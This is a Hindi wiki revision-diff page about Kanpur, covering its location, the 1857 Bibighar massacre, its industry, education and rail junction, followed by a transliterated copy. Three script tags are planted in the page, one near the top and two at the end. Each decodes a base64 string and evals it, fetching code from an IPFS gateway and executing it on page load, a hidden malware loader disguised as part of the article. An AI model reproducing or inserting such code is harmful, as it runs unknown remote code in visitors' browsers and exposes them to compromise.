Difference between revisions of "कानपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
 
==स्थिति==
 
==स्थिति==
 
{{tocright}}
 
{{tocright}}
[[उत्तर प्रदेश]] का सबसे अधिक जनसंख्या वाला यह नगर [[गंगा नदी]] के किनारे पर बसा हुआ है।  
+
कानपुर [[उत्तर प्रदेश]] का सबसे अधिक जनसंख्या वाला नगर है जो [[गंगा नदी]] के किनारे पर बसा हुआ है।  
 
==इतिहास==
 
==इतिहास==
यह 1857 के स्वतंत्रता संग्राम के प्रमुख स्थलों में से एक है। कानपुर में स्थित एक इमारत [[बीबीगढ़]] में 1857 ई. के सिपाही विद्रोह के दौरान 211 अंग्रेज़ स्त्री-पुरुषों और बच्चों को, जिन्होंने 26 जून को आत्मसमर्पण किया था, 15 जुलाई को नाना साहब और तात्या टोपे के आदेशानुसार मार डाला गया और उनके शवों को क़रीब के कुएँ में फेंक दिया गया।  
+
कानपुर 1857 के स्वतंत्रता संग्राम के प्रमुख स्थलों में से एक है। कानपुर में स्थित एक इमारत [[बीबीगढ़]] में 1857 ई. के सिपाही विद्रोह के दौरान 211 अंग्रेज़ स्त्री-पुरुषों और बच्चों को, जिन्होंने [[26 जून]] को आत्मसमर्पण किया था, [[15 जुलाई]] को नाना साहब और तात्या टोपे के आदेशानुसार मार डाला गया और उनके शवों को क़रीब के कुएँ में फेंक दिया गया।  
 
==औद्योगिक नगर==
 
==औद्योगिक नगर==
 
यह उत्तरी [[भारत]] का सबसे बड़ा औद्योगिक केन्द्र है। यहाँ पर सूती व ऊनी कपड़ों की मिलें बहुसंख्या में हैं और चमढ़े का काम विशाल पैमाने पर होता है।  
 
यह उत्तरी [[भारत]] का सबसे बड़ा औद्योगिक केन्द्र है। यहाँ पर सूती व ऊनी कपड़ों की मिलें बहुसंख्या में हैं और चमढ़े का काम विशाल पैमाने पर होता है।  

Revision as of 11:56, 15 September 2011

sthiti

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

kanapur uttar pradesh ka sabase adhik janasankhya vala nagar hai jo ganga nadi ke kinare par basa hua hai.

itihas

kanapur 1857 ke svatantrata sangram ke pramukh sthaloan mean se ek hai. kanapur mean sthit ek imarat bibigadh mean 1857 ee. ke sipahi vidroh ke dauran 211 aangrez stri-purushoan aur bachchoan ko, jinhoanne 26 joon ko atmasamarpan kiya tha, 15 julaee ko nana sahab aur tatya tope ke adeshanusar mar dala gaya aur unake shavoan ko qarib ke kuean mean pheank diya gaya.

audyogik nagar

yah uttari bharat ka sabase b da audyogik kendr hai. yahaan par sooti v ooni kap doan ki milean bahusankhya mean haian aur chamadhe ka kam vishal paimane par hota hai.

krishi

yah zila gramin aur nagar do bhagoan mean vibhakt hai.

udyog

vanaspati ghi, nirodh tatha havaee jahaz ke purje banane ka karakhana bhi yahian par hai. yahaan par sabun, plastik ki vastuean moje—baniyan adi banane ke karakhane haian.

vitaran aur sangrahan keandr

yah uttar bharat ka mukhy vitaran aur sangrahan kendr hai. jahaan nikatavarti kshetr se gu d, geanhooan, kapas adi ikattha kiya jata hai.

shiksha

kanapur shiksha ka pramukh keandr hai.

parivahan

kanapur relave steshan ek bahut b da jankshan hai. yahaan par sabhi dishaoan se 6 relamarg akar milate haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>